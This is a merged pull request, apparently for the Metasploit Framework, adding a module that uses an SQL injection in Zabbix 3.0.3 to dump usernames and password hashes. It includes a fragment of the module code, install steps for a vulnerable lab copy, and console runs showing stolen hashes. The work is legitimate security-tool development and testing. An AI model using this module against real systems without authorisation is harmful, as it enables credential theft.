### PR TITLE
Create zabbix_toggleids_sqli auxiliary module

### PR DESCRIPTION
**Pull request by brandonprry**
This module exploits a potentially unauthenticated SQL injection in version 3.0.3 in Zabbix and likely prior in order to retrieve the current usernames and password hashes.
## Verification

Download and install latest Zabbix, but do not complete the set up by setting up the database. First `apt-get remove --purge zabbix-frontend-php` and `wget http://repo.zabbix.com/zabbix/3.0/ubuntu/pool/main/z/zabbix/zabbix-frontend-php_3.0.3-1+trusty_all.deb`. Then `dpkg -i zabbix-frontend-php_3.0.3-1+trusty_all.dev`. Once this is set up, you can set up zabbix through the web UI. You should have the vulnerable copy installed.

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/zabbix_toggleids_sqli`
- [ ] `set RHOST/TARGETURI/etc/`
- [ ] **Verify** no errors are printed and that the JSON file saved contains a list of users and hashes.

```
msf auxiliary(zabbix_toggleids_sqli) > show options

Module options (auxiliary/zabbix_toggleids_sqli):

   Name         Current Setting      Required  Description
   ----         ---------------      --------  -----------
   PASSWORD     zabbix               no        The password to authenticate with
   Proxies      http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   REQUIREAUTH  true                 yes       Enforce authentication
   RHOST        172.18.20.43         yes       The target address
   RPORT        443                  yes       The target port
   SSL          true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /zabbix/             yes       The relative URI for Zabbix
   USERNAME     Admin                no        The username to authenticate with
   VHOST                             no        HTTP server virtual host

msf auxiliary(zabbix_toggleids_sqli) > run

[+] Users and password hashes stored at /home/parallels/.msf4/loot/20160821124958_default_172.18.20.43_zabbixusers.json_775490.txt
[*] Auxiliary module execution completed
msf auxiliary(zabbix_toggleids_sqli) > cat /home/parallels/.msf4/loot/20160821124958_default_172.18.20.43_zabbixusers.json_775490.txt
[*] exec: cat /home/parallels/.msf4/loot/20160821124958_default_172.18.20.43_zabbixusers.json_775490.txt

[{"alias":"Admin","passwd":"5fce1b3e34b520afeffb37ce08c7cd66"},{"alias":"guest","passwd":"d41d8cd98f00b204e9800998ecf8427e"}] 
msf auxiliary(zabbix_toggleids_sqli) > 
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Think you forgot to name it ```.rb```.

**Comment by brandonprry** [comment]
Of course I did

**Comment by wchen-r7** [comment]
Like a boss.

**Comment by wvu-r7** [comment]
This one was from your hackstream, aye?

**Comment by brandonprry** [comment]
That's correct.

File: modules/auxiliary/gather/zabbix_toggleids_sqli.rb [hunk 1]
```diff
@@ -0,0 +1,237 @@
...
+
+    res = make_injected_request(query, sid, cookies)
+
+    unless res and res.body
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    match = /#{left_marker}(.*)#{right_marker}/.match(res.body)
+
+    count = match[1].to_i
```
Comment (bwatters-r7) [inline modules/auxiliary/gather/zabbix_toggleids_sqli.rb]: @brandonprry, I see that the code checks `res` before parsing out the interesting data into `match`, but I do not see any check of `match` before indexing it.  If the query returns a value without the expected data tags, `match` will be `nil` and the module will crash when it tries to perform `match[1]`.  (FYI, the same thing will happen in the `check` module.)  A quick check and printed warning in both places with a graceful exit might help alleviate confusion if the target is not responding as expected.

**Comment by bwatters-r7** [comment]
## Zabbix install procedures:
I am unfamiliar with this product, and I followed this guide to installation for Ubuntu 14.04 (modified with your guidance) and I got it to work properly(?). 
https://www.zabbix.com/documentation/3.0/manual/installation/install_from_packages

My commands:
```

wget http://repo.zabbix.com/zabbix/3.0/ubuntu/pool/main/z/zabbix-release/zabbix-release_3.0-1+trusty_all.deb
sudo dpkg -i zabbix-release_3.0-1+trusty_all.deb
sudo apt-get update
sudo apt-get install zabbix-server-mysql zabbix-frontend-php
service apache2 reload

sudo apt-get remove --purge zabbix-frontend-php
wget http://repo.zabbix.com/zabbix/3.0/ubuntu/pool/main/z/zabbix/zabbix-frontend-php_3.0.3-1+trusty_all.deb
sudo dpkg -i zabbix-frontend-php_3.0.3-1+trusty_all.deb
service apache2 reload
sudo apt-get install zabbix-agent
sudo vi /etc/apache2/conf-enabled/zabbix.conf #Fix timezone
sudo service restart apache2
```
Afterward, there was an error message at 127.0.0.1:10050:
`ZBXD)�������ZBX_NOTSUPPORTED�Invalid item key format.`

Then, after an RTFM moment, I saw at the very bottom of the page: `Zabbix frontend is available at http://zabbix-frontend-hostname/zabbix in the browser. Default username/password is Admin/zabbix.`
<sigh>
Connecting to the server worked, but I needed to a few more set-up things as listed above, and also I had to create the database following:
https://www.zabbix.com/documentation/3.0/manual/appendix/install/db_scripts
```
shell> mysql -uroot -p<password>
mysql> create database zabbix character set utf8 collate utf8_bin;
mysql> grant all privileges on zabbix.* to zabbix@localhost identified by '<password>';
mysql> quit;
# Could not do the following.... none of these files exist on my system
shell> cd database/mysql
shell> mysql -uzabbix -p<password> zabbix < schema.sql
# stop here if you are creating database for Zabbix proxy
shell> mysql -uzabbix -p<password> zabbix < images.sql
shell> mysql -uzabbix -p<password> zabbix < data.sql
```
Anyway.... it results in a broken install, but enough to test this.

**Comment by bwatters-r7** [comment]
# Testing
```
bwatters@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
msf > use auxiliary/gather/zabbix_toggleids_sqli 
msf auxiliary(zabbix_toggleids_sqli) > show options

Module options (auxiliary/gather/zabbix_toggleids_sqli):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PASSWORD     zabbix           no        The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   REQUIREAUTH  false            yes       Enforce authentication
   RHOST                         yes       The target address
   RPORT        80               yes       The target port
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /zabbix          yes       The relative URI for Zabbix
   USERNAME     Admin            no        The username to authenticate with
   VHOST                         no        HTTP server virtual host

msf auxiliary(zabbix_toggleids_sqli) > set rhost <zabbix_IP>
rhost => <zabbix_IP>
msf auxiliary(zabbix_toggleids_sqli) > run

[+] Users and password hashes stored at /home/bwatters/.msf4/loot/20160831150017_default_<zabbix_IP>_zabbixusers.json_625471.txt
[*] Auxiliary module execution completed
msf auxiliary(zabbix_toggleids_sqli) > cat /home/bwatters/.msf4/loot/20160831150017_default_<zabbix_IP>_zabbixusers.json_625471.txt
[*] exec: cat /home/bwatters/.msf4/loot/20160831150017_default_<zabbix_IP>_zabbixusers.json_625471.txt

[{"alias":"Admin","passwd":"5fce1b3e34b520afeffb37ce08c7cd66"},{"alias":"guest","passwd":"d41d8cd98f00b204e9800998ecf8427e"}]
```
If you target a web page without the expected data, it crashes (see note above near line 90):

```
msf auxiliary(zabbix_toggleids_sqli) > show options

Module options (auxiliary/gather/zabbix_toggleids_sqli):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PASSWORD     zabbix           no        The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   REQUIREAUTH  false            yes       Enforce authentication
   RHOST        127.0.0.1        yes       The target address
   RPORT        80               yes       The target port
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /zabbix          yes       The relative URI for Zabbix
   USERNAME     Admin            no        The username to authenticate with
   VHOST                         no        HTTP server virtual host

msf auxiliary(zabbix_toggleids_sqli) > run

[-] Auxiliary failed: NoMethodError undefined method `[]' for nil:NilClass
[-] Call stack:
[-]   /home/bwatters/rapid7/metasploit-framework/modules/auxiliary/gather/zabbix_toggleids_sqli.rb:90:in `run'
[*] Auxiliary module execution completed
msf auxiliary(zabbix_toggleids_sqli) > check
[-] Check failed: NoMethodError undefined method `[]' for nil:NilClass
msf auxiliary(zabbix_toggleids_sqli) > 
```

**Comment by brandonprry** [comment]
Sorry about that @bwatters-r7, updated accordingly.

**Comment by bwatters-r7** [comment]
# ReTest
```
msf > use auxiliary/gather/zabbix_toggleids_sqli 
msf auxiliary(zabbix_toggleids_sqli) > set rhost <zabbix_IP>
rhost => <zabbix_IP>
msf auxiliary(zabbix_toggleids_sqli) > run

[+] Users and password hashes stored at /home/bwatters/.msf4/loot/20160901162238_default_<zabbix_IP>_zabbixusers.json_161699.txt
[*] Auxiliary module execution completed
msf auxiliary(zabbix_toggleids_sqli) > cat /home/bwatters/.msf4/loot/20160901162238_default_<zabbix_IP>_zabbixusers.json_161699.txt
[*] exec: cat /home/bwatters/.msf4/loot/20160901162238_default_<zabbix_IP>_zabbixusers.json_161699.txt

[{"alias":"Admin","passwd":"5fce1b3e34b520afeffb37ce08c7cd66"},{"alias":"guest","passwd":"d41d8cd98f00b204e9800998ecf8427e"}]msf auxiliary(zabbix_toggleids_sqli) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf auxiliary(zabbix_toggleids_sqli) > run

[-] Auxiliary failed: RuntimeError unknown: Server did not respond in an expected way
[-] Call stack:
[-]   /home/bwatters/rapid7/metasploit-framework/lib/msf/core/module.rb:290:in `fail_with'
[-]   /home/bwatters/rapid7/metasploit-framework/modules/auxiliary/gather/zabbix_toggleids_sqli.rb:196:in `authenticate'
[-]   /home/bwatters/rapid7/metasploit-framework/modules/auxiliary/gather/zabbix_toggleids_sqli.rb:76:in `run'
[*] Auxiliary module execution completed
msf auxiliary(zabbix_toggleids_sqli) > 
```

**Comment by bwatters-r7** [comment]
# Release Notes
Zabbix is another open-source network and application monitoring system, and this module takes advantage of a remote SQL injection vulnerability i that product to obtain the usernames and hashes from the user database in version 3.0.3 and possibly lower.

**Comment by bwatters-r7** [comment]
@brandonprry Thanks for the module and quick turnaround!  I'm going to have to check out the stream soon!

**Pull request merged**